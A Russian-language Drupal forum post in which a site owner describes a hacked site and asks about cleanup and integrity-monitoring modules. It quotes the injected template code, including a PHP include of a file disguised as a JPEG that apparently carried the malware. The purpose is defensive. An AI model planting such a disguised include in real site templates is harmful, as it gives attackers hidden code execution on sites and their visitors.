Защита от взлома. Sentry? MD5? File integrity check? Как убрать все последствия взлома?

Главные вкладки

Аватар пользователя Telefax Telefax 3 ноября 2016 в 13:27

Ядро 7.39, views 7.x-3.11

В page.tpl.php был добавлен код (моя метрика через блоки добавляется):

<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=1589156" type="text/javascript"></script>
<script src="https://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
<script type="text/javascript">
try {
    var yaCounter405850 = new Ya.Metrika({
        id:405850,
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true
    });
} catch(e) { }
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/405850" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<?php include '/pub/home/files/simple.jpg'; ?>

Содержимое simple.jpg в приложенном файле.
Судя по датам изменения файлов провисело все с июля месяца, сейчас при выполнении кода из simple.jpg стали вываливаться ошибки...

Вроде бы следов кроме page.tpl.php не нашел, но может кто сталкивался где еще эта зараза могла наследить?

По поводу защиты:
Sentry? MD5? File integrity check? Что из этих модулей лучше использовать?
Есть какая-то защита от того, что при взломе модуль контроля так же будет изменен и соответственно перестанет работать корректно? В теории можно забрать права на запись в этот файл через SSH, но опять таки при правильном подходе их можно вернуть т.к. все процессы на шаред хостинге запускаются от одного юзера...

А как быть с базой? В некоторых местах используется php код в нодах, но даже если от этого уйти, как контролировать замену контента напрямую в базе? Можно же навставлять всякой муры типа js. Может есть какой-то модуль который при изменении содержимого ноды генерирует некий шифрованный ключ с чексуммой, т.е. если содержимое ноды было изменено не штатными средствами -- тревога?

ВложениеРазмер
Иконка простого текстового файла simple.jpg_decoded.txt130.31 КБ